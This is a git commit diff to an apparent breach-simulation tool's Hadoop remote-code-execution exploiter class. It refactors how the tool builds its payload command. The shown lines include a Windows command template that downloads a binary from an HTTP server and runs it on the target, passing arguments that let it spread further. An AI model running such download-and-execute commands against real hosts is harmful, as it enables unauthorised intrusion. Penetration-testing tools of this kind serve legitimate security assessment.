Hadoop exploitation tested on windows and linux

This commit is contained in:
Vakaris 2018-08-28 19:33:36 +03:00
parent 568320c298
commit 818aae3a2c
1 changed files with 5 additions and 8 deletions

View File

@ -11,7 +11,7 @@ import logging
from exploit.web_rce import WebRCE
from tools import HTTPTools, build_monkey_commandline, get_monkey_depth
import posixpath
from model import MONKEY_ARG, ID_STRING, DROPPER_ARG
from model import MONKEY_ARG, ID_STRING
__author__ = 'VakarisZ'
@ -32,14 +32,12 @@ class HadoopExploiter(WebRCE):
" Update /download /priority high %(http_path)s %(monkey_path)s " \
"& %(monkey_path)s %(monkey_type)s %(parameters)s"
# How long we have our http server open for downloads in seconds
DOWNLOAD_TIMEOUT = 90
DOWNLOAD_TIMEOUT = 60
# Random string's length that's used for creating unique app name
RAN_STR_LEN = 6
def __init__(self, host):
super(HadoopExploiter, self).__init__(host, {'linux': './monkey.sh',
'win32': '%temp%\\monkey32.exe',
'win64': '%temp%\\monkey64.exe'})
super(HadoopExploiter, self).__init__(host)
def exploit_host(self):
# Try to get exploitable url
@ -77,16 +75,15 @@ class HadoopExploiter(WebRCE):
return resp.status_code == 200
def build_command(self, path, http_path):
default_path = self.get_default_dropper_path()
# Build command to execute
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, default_path)
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
if 'linux' in self.host.os['type']:
base_command = self.LINUX_COMMAND
else:
base_command = self.WINDOWS_COMMAND
return base_command % {"monkey_path": path, "http_path": http_path,
"monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
"monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
@staticmethod
def build_payload(app_id, name, command):